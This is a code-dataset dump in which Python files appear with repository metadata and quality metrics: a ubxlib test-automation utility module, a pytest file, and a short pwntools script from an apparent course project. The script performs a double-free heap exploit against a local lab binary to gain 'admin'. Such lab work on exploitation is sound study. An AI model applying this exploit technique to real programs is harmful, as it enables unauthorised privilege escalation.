| 0.762061
| 0.042004
| 0
| 0.266129
| 0
| 0
| 0.064464
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064516
| false
| 0
| 0.056452
| 0
| 0.177419
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddebffcf3d40adc0208ac8b35c967b6d0551178a
| 38,079
|
py
|
Python
|
port/platform/common/automation/u_utils.py
|
stephanboner/ubxlib
|
64025c5760771ac2accd09f9f176693c7add2919
|
[
"Apache-2.0"
] | null | null | null |
port/platform/common/automation/u_utils.py
|
stephanboner/ubxlib
|
64025c5760771ac2accd09f9f176693c7add2919
|
[
"Apache-2.0"
] | null | null | null |
port/platform/common/automation/u_utils.py
|
stephanboner/ubxlib
|
64025c5760771ac2accd09f9f176693c7add2919
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
'''Generally useful bits and bobs.'''
import queue # For PrintThread and exe_run
from time import sleep, time, gmtime, strftime # For lock timeout, exe_run timeout and logging
import threading # For PrintThread
import os # For ChangeDir, has_admin
import stat # To help deltree out
from telnetlib import Telnet # For talking to JLink server
import socket
import shutil # To delete a directory tree
import signal # For CTRL_C_EVENT
import subprocess
import platform # Figure out current OS
import serial # Pyserial (make sure to do pip install pyserial)
import psutil # For killing things (make sure to do pip install psutil)
import u_settings
# How long to wait for an install lock in seconds
INSTALL_LOCK_WAIT_SECONDS = u_settings.INSTALL_LOCK_WAIT_SECONDS #(60 * 60)
# The URL for Unity, the unit test framework
UNITY_URL = u_settings.UNITY_URL #"https://github.com/ThrowTheSwitch/Unity"
# The sub-directory that Unity is usually put in
# (off the working directory)
UNITY_SUBDIR = u_settings.UNITY_SUBDIR #"Unity"
# The path to DevCon, a Windows tool that allows
# USB devices to be reset, amongst other things
DEVCON_PATH = u_settings.DEVCON_PATH #"devcon.exe"
# The path to jlink.exe (or just the name 'cos it's on the path)
JLINK_PATH = u_settings.JLINK_PATH #"jlink.exe"
# The port number for SWO trace capture out of JLink
JLINK_SWO_PORT = u_settings.JLINK_SWO_PORT #19021
# The port number for GDB control of ST-LINK GDB server
STLINK_GDB_PORT = u_settings.STLINK_GDB_PORT #61200
# The port number for SWO trace capture out of ST-LINK GDB server
STLINK_SWO_PORT = u_settings.STLINK_SWO_PORT #61300
# The format string passed to strftime()
# for logging prints
TIME_FORMAT = u_settings.TIME_FORMAT #"%Y-%m-%d_%H:%M:%S"
# The default guard time waiting for a platform lock in seconds
PLATFORM_LOCK_GUARD_TIME_SECONDS = u_settings.PLATFORM_LOCK_GUARD_TIME_SECONDS #60 * 60
# The default guard time for downloading to a target in seconds
DOWNLOAD_GUARD_TIME_SECONDS = u_settings.DOWNLOAD_GUARD_TIME_SECONDS #60
# The default guard time for running tests in seconds
RUN_GUARD_TIME_SECONDS = u_settings.RUN_GUARD_TIME_SECONDS #60 * 60
# The default inactivity timer for running tests in seconds
RUN_INACTIVITY_TIME_SECONDS = u_settings.RUN_INACTIVITY_TIME_SECONDS #60 * 5
# The name of the #define that forms the filter string
# for which tests to run
FILTER_MACRO_NAME = u_settings.FILTER_MACRO_NAME #"U_CFG_APP_FILTER"
# The time for which to wait for something from the
# queue in exe_run(). If this is too short, in a
# multiprocessing world or on a slow machine, it is
# possible to miss things as the task putting things
# on the queue may be blocked from doing so until
# we've decided the queue has been completely emptied
# and moved on
EXE_RUN_QUEUE_WAIT_SECONDS = u_settings.EXE_RUN_QUEUE_WAIT_SECONDS #1
def subprocess_osify(cmd):
'''Expects a list of strings of the form [command, param, ...]'''
if platform.system() == "Linux":
return [ ' '.join(cmd) ]
return cmd
def get_actual_path(path):
'''Given a drive number return real path if it is a subst'''
actual_path = path
# Get a list of substs
text = subprocess.check_output("subst",
stderr=subprocess.STDOUT,
shell=True) # Jenkins hangs without this
for line in text.splitlines():
# Lines should look like this:
# Z:\: => C:\projects\ubxlib_priv
# So, in this example, if we were given z:\blah
# then the actual path should be C:\projects\ubxlib_priv\blah
text = line.decode()
bits = text.rsplit(": => ")
if (len(bits) > 1) and (len(path) > 1) and \
(bits[0].lower()[0:2] == path[0:2].lower()):
actual_path = bits[1] + path[2:]
break
return actual_path
def get_instance_text(instance):
'''Return the instance as a text string'''
instance_text = ""
for idx, item in enumerate(instance):
if idx == 0:
instance_text += str(item)
else:
instance_text += "." + str(item)
return instance_text
def remove_readonly(func, path, exec_info):
'''Help deltree out'''
del exec_info
os.chmod(path, stat.S_IWRITE)
func(path)
def deltree(directory, printer, prompt):
'''Remove an entire directory tree'''
tries = 2
success = False
if os.path.isdir(directory):
# Retry this as sometimes Windows complains
# that the directory is not empty when it
# really should be, some sort of internal
# Windows race condition
while not success and (tries > 0):
try:
# Need the onerror bit on Winders, see
# this Stack Overflow post:
# https://stackoverflow.com/questions/1889597/deleting-directory-in-python
shutil.rmtree(directory, onerror=remove_readonly)
success = True
except OSError as ex:
printer.string("{}ERROR unable to delete \"{}\" {}: \"{}\"".
format(prompt, directory,
ex.errno, ex.strerror))
tries -= 1
else:
success = True
return success
# Check if admin privileges are available, from:
# https://stackoverflow.com/questions/2946746/python-checking-if-a-user-has-administrator-privileges
def has_admin():
'''Check for administrator privileges'''
admin = False
if os.name == 'nt':
try:
# only Windows users with admin privileges can read the C:\windows\temp
if os.listdir(os.sep.join([os.environ.get("SystemRoot", "C:\\windows"), "temp"])):
admin = True
except PermissionError:
pass
else:
# Pylint will complain about the following line but
# that's OK, it is only executed if we're NOT on Windows
# and there the geteuid() method will exist
if "SUDO_USER" in os.environ and os.geteuid() == 0:
admin = True
return admin
# Reset a USB port with the given Device Description
def usb_reset(device_description, printer, prompt):
''' Reset a device'''
instance_id = None
found = False
success = False
try:
# Run devcon and parse the output to find the given device
printer.string("{}running {} to look for \"{}\"...". \
format(prompt, DEVCON_PATH, device_description))
cmd = [DEVCON_PATH, "hwids", "=ports"]
text = subprocess.check_output(subprocess_osify(cmd),
stderr=subprocess.STDOUT,
shell=True) # Jenkins hangs without this
for line in text.splitlines():
# The format of a devcon entry is this:
#
# USB\VID_1366&PID_1015&MI_00\6&38E81674&0&0000
# Name: JLink CDC UART Port (COM45)
# Hardware IDs:
# USB\VID_1366&PID_1015&REV_0100&MI_00
# USB\VID_1366&PID_1015&MI_00
# Compatible IDs:
# USB\Class_02&SubClass_02&Prot_00
# USB\Class_02&SubClass_02
# USB\Class_02
#
# Grab what we hope is the instance ID
line = line.decode()
if line.startswith("USB"):
instance_id = line
else:
# If the next line is the Name we want then we're done
if instance_id and ("Name: " + device_description in line):
found = True
printer.string("{}\"{}\" found with instance ID \"{}\"". \
format(prompt, device_description,
instance_id))
break
instance_id = None
if found:
# Now run devcon to reset the device
printer.string("{}running {} to reset device \"{}\"...". \
format(prompt, DEVCON_PATH, instance_id))
cmd = [DEVCON_PATH, "restart", "@" + instance_id]
text = subprocess.check_output(subprocess_osify(cmd),
stderr=subprocess.STDOUT,
shell=False) # Has to be False or devcon won't work
for line in text.splitlines():
printer.string("{}{}".format(prompt, line.decode()))
success = True
else:
printer.string("{}device with description \"{}\" not found.". \
format(prompt, device_description))
except subprocess.CalledProcessError:
printer.string("{} unable to find and reset device.".format(prompt))
return success
# Open the required serial port.
def open_serial(serial_name, speed, printer, prompt):
'''Open serial port'''
serial_handle = None
text = "{}: trying to open \"{}\" as a serial port...". \
format(prompt, serial_name)
try:
return_value = serial.Serial(serial_name, speed, timeout=0.05)
serial_handle = return_value
printer.string("{} opened.".format(text))
except (ValueError, serial.SerialException) as ex:
printer.string("{}{} while accessing port {}: {}.".
format(prompt, type(ex).__name__,
serial_handle.name, str(ex)))
return serial_handle
def open_telnet(port_number, printer, prompt):
'''Open telnet port on localhost'''
telnet_handle = None
text = "{}trying to open \"{}\" as a telnet port on localhost...". \
format(prompt, port_number)
try:
telnet_handle = Telnet("localhost", int(port_number), timeout=5)
if telnet_handle is not None:
printer.string("{} opened.".format(text))
else:
printer.string("{} failed.".format(text))
except (socket.error, socket.timeout, ValueError) as ex:
printer.string("{}{} failed to open telnet {}: {}.".
format(prompt, type(ex).__name__,
port_number, str(ex)))
return telnet_handle
def install_lock_acquire(install_lock, printer, prompt):
'''Attempt to acquire install lock'''
timeout_seconds = INSTALL_LOCK_WAIT_SECONDS
success = False
if install_lock:
printer.string("{}waiting for install lock...".format(prompt))
while not install_lock.acquire(False) and (timeout_seconds > 0):
sleep(1)
timeout_seconds -= 1
if timeout_seconds > 0:
printer.string("{}got install lock.".format(prompt))
success = True
else:
printer.string("{}failed to aquire install lock.".format(prompt))
else:
printer.string("{}warning, there is no install lock.".format(prompt))
return success
def install_lock_release(install_lock, printer, prompt):
'''Release install lock'''
if install_lock:
install_lock.release()
printer.string("{}install lock released.".format(prompt))
def fetch_repo(url, directory, branch, printer, prompt):
'''Fetch a repo: directory can be relative or absolute'''
got_code = False
checked_out = False
success = False
printer.string("{}in directory {}, fetching"
" {} to directory {}".format(prompt, os.getcwd(),
url, directory))
if not branch:
branch = "master"
if os.path.isdir(directory):
# Update existing code
with ChangeDir(directory):
printer.string("{}updating code in {}...".
format(prompt, directory))
try:
text = subprocess.check_output(subprocess_osify(["git", "pull",
"origin", branch]),
stderr=subprocess.STDOUT,
shell=True) # Jenkins hangs without this
for line in text.splitlines():
printer.string("{}{}".format(prompt, line.decode()))
got_code = True
except subprocess.CalledProcessError as error:
printer.string("{}git returned error {}: \"{}\"".
format(prompt, error.returncode,
error.output))
else:
# Clone the repo
printer.string("{}cloning from {} into {}...".
format(prompt, url, directory))
try:
text = subprocess.check_output(subprocess_osify(["git", "clone", url, directory]),
stderr=subprocess.STDOUT,
shell=True) # Jenkins hangs without this
for line in text.splitlines():
printer.string("{}{}".format(prompt, line.decode()))
got_code = True
except subprocess.CalledProcessError as error:
printer.string("{}git returned error {}: \"{}\"".
format(prompt, error.returncode,
error.output))
if got_code and os.path.isdir(directory):
# Check out the correct branch and recurse submodules
with ChangeDir(directory):
printer.string("{}checking out branch {}...".
format(prompt, branch))
try:
text = subprocess.check_output(subprocess_osify(["git", "-c",
"advice.detachedHead=false",
"checkout",
"origin/" + branch]),
stderr=subprocess.STDOUT,
shell=True) # Jenkins hangs without this
for line in text.splitlines():
printer.string("{}{}".format(prompt, line.decode()))
checked_out = True
except subprocess.CalledProcessError as error:
printer.string("{}git returned error {}: \"{}\"".
format(prompt, error.returncode,
error.output))
if checked_out:
printer.string("{}recursing sub-modules (can take some time" \
" and gives no feedback).".format(prompt))
try:
text = subprocess.check_output(subprocess_osify(["git", "submodule",
"update", "--init",
"--recursive"]),
stderr=subprocess.STDOUT,
shell=True) # Jenkins hangs without this
for line in text.splitlines():
printer.string("{}{}".format(prompt, line.decode()))
success = True
except subprocess.CalledProcessError as error:
printer.string("{}git returned error {}: \"{}\"".
format(prompt, error.returncode,
error.output))
return success
def exe_where(exe_name, help_text, printer, prompt):
'''Find an executable using where.exe or which on linux'''
success = False
try:
printer.string("{}looking for \"{}\"...". \
format(prompt, exe_name))
# See here:
# https://stackoverflow.com/questions/14928860/passing-double-quote-shell-commands-in-python-to-subprocess-popen
# ...for why the construction "".join() is necessary when
# passing things which might have spaces in them.
# It is the only thing that works.
if platform.system() == "Linux":
cmd = ["which {}".format(exe_name)]
printer.string("{}detected linux, calling \"{}\"...".format(prompt, cmd))
else:
cmd = ["where", "".join(exe_name)]
printer.string("{}detected nonlinux, calling \"{}\"...".format(prompt, cmd))
text = subprocess.check_output(cmd,
stderr=subprocess.STDOUT,
shell=True) # Jenkins hangs without this
for line in text.splitlines():
printer.string("{}{} found in {}".format(prompt, exe_name,
line.decode()))
success = True
except subprocess.CalledProcessError:
if help_text:
printer.string("{}ERROR {} not found: {}". \
format(prompt, exe_name, help_text))
else:
printer.string("{}ERROR {} not found". \
format(prompt, exe_name))
return success
def exe_version(exe_name, version_switch, printer, prompt):
'''Print the version of a given executable'''
success = False
if not version_switch:
version_switch = "--version"
try:
text = subprocess.check_output(subprocess_osify(["".join(exe_name), version_switch]),
stderr=subprocess.STDOUT,
shell=True) # Jenkins hangs without this
for line in text.splitlines():
printer.string("{}{}".format(prompt, line.decode()))
success = True
except subprocess.CalledProcessError:
printer.string("{}ERROR {} either not found or didn't like {}". \
format(prompt, exe_name, version_switch))
return success
def exe_terminate(process_pid):
'''Terminate a process and all of its children (Jonathan's killer)'''
process = psutil.Process(process_pid)
for proc in process.children(recursive=True):
proc.terminate()
process.terminate()
def read_from_process_and_queue(process, read_queue):
'''Read from a process, non-blocking'''
while process.poll() is None:
string = process.stdout.readline().decode()
if string:
read_queue.put(string)
def queue_get_no_exception(the_queue, block=True, timeout=None):
'''A version of queue.get() that doesn't throw an Empty exception'''
thing = None
try:
thing = the_queue.get(block=block, timeout=timeout)
except queue.Empty:
pass
return thing
def capture_env_var(line, env, printer, prompt):
'''A bit of exe_run that needs to be called from two places'''
# Find a KEY=VALUE bit in the line,
# parse it out and put it in the dictionary
# we were given
pair = line.split('=', 1)
if len(pair) == 2:
env[pair[0]] = pair[1].rstrip()
else:
printer.string("{}WARNING: not an environment variable: \"{}\"".
format(prompt, line))
# Note: if returned_env is given then "set"
# will be executed after the exe and the environment
# variables will be returned in it. The down-side
# of this is that the return value of the exe is,
# of course, lost.
def exe_run(call_list, guard_time_seconds, printer, prompt,
shell_cmd=False, set_env=None, returned_env=None):
'''Call an executable, printing out what it does'''
success = False
start_time = time()
flibbling = False
kill_time = None
read_time = start_time
if returned_env is not None:
# The caller wants the environment after the
# command has run, so, from this post:
# https://stackoverflow.com/questions/1214496/how-to-get-environment-from-a-subprocess
# append a tag that we can detect
# to the command and then call set,
# from which we can parse the environment
call_list.append("&&")
call_list.append("echo")
call_list.append("flibble")
call_list.append("&&")
call_list.append("set")
# I've seen output from set get lost,
# possibly because the process ending
# is asynchronous with stdout,
# so add a delay here as well
call_list.append("&&")
call_list.append("sleep")
call_list.append("2")
try:
# Call the thang
# Note: used to have bufsize=1 here but it turns out
# that is ignored 'cos the output is considered
# binary. Seems to work in any case, I guess
# Winders, at least, is in any case line-buffered.
process = subprocess.Popen(call_list,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
shell=shell_cmd,
env=set_env)
printer.string("{}{}, pid {} started with guard time {} second(s)". \
format(prompt, call_list[0], process.pid,
guard_time_seconds))
# This is over complex but, unfortunately, necessary.
# At least one thing that we try to run, nrfjprog, can
# crash silently: just hangs and sends no output. However
# it also doesn't flush and close stdout and so read(1)
# will hang, meaning we can't read its output as a means
# to check that it has hung.
# So, here we poll for the return value, which is normally
# how things will end, and we start another thread which
# reads from the process's stdout. If the thread sees
# nothing for guard_time_seconds then we terminate the
# process.
read_queue = queue.Queue()
read_thread = threading.Thread(target=read_from_process_and_queue,
args=(process, read_queue))
read_thread.start()
while process.poll() is None:
if guard_time_seconds and (kill_time is None) and \
((time() - start_time > guard_time_seconds) or
(time() - read_time > guard_time_seconds)):
kill_time = time()
printer.string("{}guard time of {} second(s)." \
" expired, stopping {}...".
format(prompt, guard_time_seconds,
call_list[0]))
exe_terminate(process.pid)
line = queue_get_no_exception(read_queue, True, EXE_RUN_QUEUE_WAIT_SECONDS)
read_time = time()
while line is not None:
line = line.rstrip()
if flibbling:
capture_env_var(line, returned_env, printer, prompt)
else:
if returned_env is not None and "flibble" in line:
flibbling = True
else:
printer.string("{}{}".format(prompt, line))
line = queue_get_no_exception(read_queue, True, EXE_RUN_QUEUE_WAIT_SECONDS)
read_time = time()
# Can't join() read_thread here as it might have
# blocked on a read() (if nrfjprog has anything to
# do with it). It will be tidied up when this process
# exits.
# There may still be stuff on the queue, read it out here
line = queue_get_no_exception(read_queue, True, EXE_RUN_QUEUE_WAIT_SECONDS)
while line is not None:
line = line.rstrip()
if flibbling:
capture_env_var(line, returned_env, printer, prompt)
else:
if returned_env is not None and "flibble" in line:
flibbling = True
else:
printer.string("{}{}".format(prompt, line))
line = queue_get_no_exception(read_queue, True, EXE_RUN_QUEUE_WAIT_SECONDS)
# There may still be stuff in the buffer after
# the application has finished running so flush that
# out here
line = process.stdout.readline().decode()
while line:
line = line.rstrip()
if flibbling:
capture_env_var(line, returned_env, printer, prompt)
else:
if returned_env is not None and "flibble" in line:
flibbling = True
else:
printer.string("{}{}".format(prompt, line))
line = process.stdout.readline().decode()
if (process.poll() == 0) and kill_time is None:
success = True
printer.string("{}{}, pid {} ended with return value {}.". \
format(prompt, call_list[0],
process.pid, process.poll()))
except ValueError as ex:
printer.string("{}failed: {} while trying to execute {}.". \
format(prompt, type(ex).__name__, str(ex)))
return success
class ExeRun():
'''Run an executable as a "with:"'''
def __init__(self, call_list, printer, prompt, shell_cmd=False, with_stdin=False):
self._call_list = call_list
self._printer = printer
self._prompt = prompt
self._shell_cmd = shell_cmd
self._with_stdin = with_stdin
self._process = None
def __enter__(self):
if self._printer:
text = ""
for idx, item in enumerate(self._call_list):
if idx == 0:
text = item
else:
text += " {}".format(item)
self._printer.string("{}starting {}...".format(self._prompt,
text))
try:
# Start exe
if self._with_stdin:
self._process = subprocess.Popen(self._call_list,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
shell=self._shell_cmd,
creationflags=subprocess.CREATE_NEW_PROCESS_GROUP)
else:
self._process = subprocess.Popen(self._call_list,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
shell=self._shell_cmd,
creationflags=subprocess.CREATE_NEW_PROCESS_GROUP)
self._printer.string("{}{} pid {} started".format(self._prompt,
self._call_list[0],
self._process.pid))
except (OSError, subprocess.CalledProcessError, ValueError) as ex:
if self._printer:
self._printer.string("{}failed: {} to start {}.". \
format(self._prompt,
type(ex).__name__, str(ex)))
return self._process
def __exit__(self, _type, value, traceback):
del _type
del value
del traceback
# Stop exe
if self._printer:
self._printer.string("{}stopping {}...". \
format(self._prompt,
self._call_list[0]))
return_value = self._process.poll()
if not return_value:
retry = 5
while (self._process.poll() is None) and (retry > 0):
# Try to stop with CTRL-C
self._process.send_signal(signal.CTRL_BREAK_EVENT)
sleep(1)
retry -= 1
return_value = self._process.poll()
if not return_value:
# Terminate with a vengeance
self._process.terminate()
while self._process.poll() is None:
pass
self._printer.string("{}{} pid {} terminated".format(self._prompt,
self._call_list[0],
self._process.pid))
else:
self._printer.string("{}{} pid {} CTRL-C'd".format(self._prompt,
self._call_list[0],
self._process.pid))
else:
self._printer.string("{}{} pid {} already ended".format(self._prompt,
self._call_list[0],
self._process.pid))
return return_value
# Simple SWO decoder: only handles single bytes of application
# data at a time, i.e. what ITM_SendChar() sends.
class SwoDecoder():
'''Take the contents of a byte_array and decode it as SWO'''
def __init__(self, address, replaceLfWithCrLf=False):
self._address = address
self._replace_lf_with_crlf = replaceLfWithCrLf
self._expecting_swit = True
def decode(self, swo_byte_array):
'''Do the decode'''
decoded_byte_array = bytearray()
if swo_byte_array:
for data_byte in swo_byte_array:
# We're looking only for "address" and we also know
# that CMSIS only offers ITM_SendChar(), so packet length
# is always 1, and we only send ASCII characters,
# so the top bit of the data byte must be 0.
#
# For the SWO protocol, see:
#
# https://developer.arm.com/documentation/ddi0314/h/
# instrumentation-trace-macrocell/
# about-the-instrumentation-trace-macrocell/trace-packet-format
#
# When we see SWIT (SoftWare Instrumentation Trace
# I think, anyway, the bit that carries our prints
# off the target) which is 0bBBBBB0SS, where BBBBB is
# address and SS is the size of payload to follow,
# in our case 0x01, we know that the next
# byte is probably data and if it is ASCII then
# it is data. Anything else is ignored.
# The reason for doing it this way is that the
# ARM ITM only sends out sync packets under
# special circumstances so it is not a recovery
# mechanism for simply losing a byte in the
# transfer, which does happen occasionally.
if self._expecting_swit:
if ((data_byte & 0x03) == 0x01) and ((data_byte & 0xf8) >> 3 == self._address):
# Trace packet type is SWIT, i.e. our
# application logging
self._expecting_swit = False
else:
if data_byte & 0x80 == 0:
if (data_byte == 10) and self._replace_lf_with_crlf:
decoded_byte_array.append(13)
decoded_byte_array.append(data_byte)
self._expecting_swit = True
return decoded_byte_array
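# Usage sketch (illustrative bytes): 0x01 is a SWIT header for address 0 with
# a 1-byte payload, so the stream below decodes to b'Hi\r\n':
# decoder = SwoDecoder(0, replaceLfWithCrLf=True)
# decoder.decode(bytearray([0x01, ord('H'), 0x01, ord('i'), 0x01, 10]))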
class PrintThread(threading.Thread):
'''Print thread to organise prints nicely'''
def __init__(self, print_queue):
self._queue = print_queue
self._running = False
threading.Thread.__init__(self)
def stop_thread(self):
'''Helper function to stop the thread'''
self._running = False
def run(self):
'''Worker thread'''
self._running = True
while self._running:
try:
my_string = self._queue.get(block=False, timeout=0.5)
print(my_string)
except queue.Empty:
pass
class PrintToQueue():
'''Print to a queue, if there is one'''
def __init__(self, print_queue, file_handle, include_timestamp=False):
self._queue = print_queue
self._file_handle = file_handle
self._include_timestamp = include_timestamp
def string(self, string, file_only=False):
'''Print a string'''
if self._include_timestamp:
string = strftime(TIME_FORMAT, gmtime()) + " " + string
if not file_only:
if self._queue:
self._queue.put(string)
else:
print(string)
if self._file_handle:
self._file_handle.write(string + "\n")
self._file_handle.flush()
# This stolen from here:
# https://stackoverflow.com/questions/431684/how-do-i-change-the-working-directory-in-python
class ChangeDir():
'''Context manager for changing the current working directory'''
def __init__(self, new_path):
self._new_path = os.path.expanduser(new_path)
self._saved_path = None
def __enter__(self):
'''CD to new_path'''
self._saved_path = os.getcwd()
os.chdir(self._new_path)
def __exit__(self, etype, value, traceback):
'''CD back to saved_path'''
os.chdir(self._saved_path)
class Lock():
'''Hold a lock as a "with:"'''
def __init__(self, lock, guard_time_seconds,
lock_type, printer, prompt):
self._lock = lock
self._guard_time_seconds = guard_time_seconds
self._lock_type = lock_type
self._printer = printer
self._prompt = prompt
self._locked = False
def __enter__(self):
if not self._lock:
return True
# Wait on the lock
if not self._locked:
timeout_seconds = self._guard_time_seconds
self._printer.string("{}waiting up to {} second(s)" \
" for a {} lock...". \
format(self._prompt,
self._guard_time_seconds,
self._lock_type))
count = 0
while not self._lock.acquire(False) and \
((self._guard_time_seconds == 0) or (timeout_seconds > 0)):
sleep(1)
timeout_seconds -= 1
count += 1
if count == 30:
self._printer.string("{}still waiting {} second(s)" \
" for a {} lock (locker is" \
" currently {}).". \
format(self._prompt, timeout_seconds,
self._lock_type, self._lock))
count = 0
if (self._guard_time_seconds == 0) or (timeout_seconds > 0):
self._locked = True
self._printer.string("{}{} lock acquired ({}).". \
format(self._prompt, self._lock_type,
self._lock))
return self._locked
def __exit__(self, _type, value, traceback):
del _type
del value
del traceback
if self._lock and self._locked:
try:
self._lock.release()
self._locked = False
self._printer.string("{}released a {} lock.".format(self._prompt,
self._lock_type))
except RuntimeError:
self._locked = False
self._printer.string("{}{} lock was already released.". \
format(self._prompt, self._lock_type))
def wait_for_completion(items, purpose, guard_time_seconds,
printer, prompt):
'''Wait for a completion list to empty'''
completed = False
if len(items) > 0:
timeout_seconds = guard_time_seconds
printer.string("{}waiting up to {} second(s)" \
" for {} completion...". \
format(prompt, guard_time_seconds, purpose))
count = 0
while (len(items) > 0) and \
((guard_time_seconds == 0) or (timeout_seconds > 0)):
sleep(1)
timeout_seconds -= 1
count += 1
if count == 30:
list_text = ""
for item in items:
if list_text:
list_text += ", "
list_text += str(item)
printer.string("{}still waiting {} second(s)" \
" for {} to complete (waiting" \
" for {}).". \
format(prompt, timeout_seconds,
purpose, list_text))
count = 0
if len(items) == 0:
completed = True
printer.string("{}{} completed.".format(prompt, purpose))
return completed
def reset_nrf_target(connection, printer, prompt):
'''Reset a Nordic NRFxxx target'''
call_list = []
printer.string("{}resetting target...".format(prompt))
# Assemble the call list
call_list.append("nrfjprog")
call_list.append("--reset")
if connection and "debugger" in connection and connection["debugger"]:
call_list.append("-s")
call_list.append(connection["debugger"])
# Print what we're gonna do
tmp = ""
for item in call_list:
tmp += " " + item
printer.string("{}in directory {} calling{}". \
format(prompt, os.getcwd(), tmp))
# Call it
return exe_run(call_list, 60, printer, prompt)
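A hedged usage sketch for the Lock context manager defined above; StdoutPrinter is a hypothetical stand-in for the printer interface, and the import assumes this module and its dependencies are available:

import multiprocessing
from u_utils import Lock  # assumes u_utils.py (and its pip dependencies) is importable

class StdoutPrinter:
    '''Hypothetical stand-in exposing the printer.string() interface used above.'''
    def string(self, string, file_only=False):
        print(string)

printer = StdoutPrinter()
platform_lock = multiprocessing.Manager().Lock()
with Lock(platform_lock, 10, 'platform', printer, 'demo: ') as acquired:
    if acquired:
        printer.string('demo: doing work while holding the platform lock')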
| 42.930101
| 120
| 0.536437
| 4,151
| 38,079
| 4.757408
| 0.166466
| 0.041473
| 0.019445
| 0.016407
| 0.329755
| 0.254203
| 0.214756
| 0.186449
| 0.173587
| 0.150243
| 0
| 0.009467
| 0.370335
| 38,079
| 886
| 121
| 42.978555
| 0.814155
| 0.20896
| 0
| 0.399679
| 0
| 0
| 0.070385
| 0.00084
| 0
| 0
| 0.000538
| 0
| 0
| 1
| 0.05939
| false
| 0.006421
| 0.022472
| 0
| 0.126806
| 0.149278
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddf10fa882b2377b78f180954bd012323f534965
| 514
|
py
|
Python
|
test/unit/test_main.py
|
CMPUT291PROJECT1F18/Mini-Project-1
|
b58144dd80c40466de755877b7c3996f4aa67af9
|
[
"MIT"
] | 1
|
2018-11-06T01:04:13.000Z
|
2018-11-06T01:04:13.000Z
|
test/unit/test_main.py
|
CMPUT291PROJECT1F18/Mini-Project-1
|
b58144dd80c40466de755877b7c3996f4aa67af9
|
[
"MIT"
] | 39
|
2018-10-23T00:28:13.000Z
|
2018-11-06T16:14:56.000Z
|
test/unit/test_main.py
|
CMPUT291PROJECT1F18/Mini-Project-1
|
b58144dd80c40466de755877b7c3996f4aa67af9
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""pytests for :mod:`.__main__`"""
from mini_project_1.__main__ import get_parser, main
import mock
def test_get_parser():
parser = get_parser()
assert parser
def test_main(tmpdir):
tmp_file = tmpdir.join("thefile_name.json")
tmp_file_name = str(tmp_file)
with mock.patch('builtins.input', return_value='foo'):
with mock.patch('mini_project_1.shell.MiniProjectShell.cmdloop', return_value='bar'):
main(["-i", tmp_file_name])
| 23.363636
| 93
| 0.680934
| 72
| 514
| 4.5
| 0.569444
| 0.08642
| 0.074074
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007009
| 0.167315
| 514
| 21
| 94
| 24.47619
| 0.75
| 0.13035
| 0
| 0
| 0
| 0
| 0.190909
| 0.102273
| 0
| 0
| 0
| 0
| 0.090909
| 1
| 0.181818
| false
| 0
| 0.181818
| 0
| 0.363636
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddf791c1dd4726087d87f8647d381ae32e01c53c
| 437
|
py
|
Python
|
6. Heap exploitation/exploit_3.py
|
MBWlodarczyk/bso_project
|
a4620fb18d7f789d917627232dc85ef9bcad7e3d
|
[
"MIT"
] | null | null | null |
6. Heap exploitation/exploit_3.py
|
MBWlodarczyk/bso_project
|
a4620fb18d7f789d917627232dc85ef9bcad7e3d
|
[
"MIT"
] | null | null | null |
6. Heap exploitation/exploit_3.py
|
MBWlodarczyk/bso_project
|
a4620fb18d7f789d917627232dc85ef9bcad7e3d
|
[
"MIT"
] | 1
|
2021-05-27T22:04:35.000Z
|
2021-05-27T22:04:35.000Z
|
from pwn import *
def malloc(name):
p.sendlineafter('>> ','1 '+name)
def free(id):
p.sendlineafter('>> ', '2 '+str(id))
p = process("./vuln_3.o")
gdb.attach(p)
for i in range(8):
malloc('a')
malloc('a')
malloc('a')
for i in range(9):
free(i-1)
free(8)
free(9)
free(8)
for i in range(8):
malloc('a')
malloc('\x48\xc0\x04\x08')
malloc('1')
malloc('1')
p.sendlineafter('>> ','1 ' +'admin')
p.interactive()
| 11.5
| 40
| 0.567506
| 73
| 437
| 3.383562
| 0.438356
| 0.11336
| 0.072874
| 0.133603
| 0.202429
| 0.202429
| 0.202429
| 0.202429
| 0
| 0
| 0
| 0.05618
| 0.185355
| 437
| 37
| 41
| 11.810811
| 0.63764
| 0
| 0
| 0.434783
| 0
| 0
| 0.118993
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.086957
| false
| 0
| 0.043478
| 0
| 0.130435
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddf7f46a03e2f875d36d3fadd6c70b90528b78f0
| 1,202
|
py
|
Python
|
setup.py
|
originell/sentry-twilio
|
716c444649b38b68f9d6a02986de090bb7e580b9
|
[
"MIT"
] | null | null | null |
setup.py
|
originell/sentry-twilio
|
716c444649b38b68f9d6a02986de090bb7e580b9
|
[
"MIT"
] | 1
|
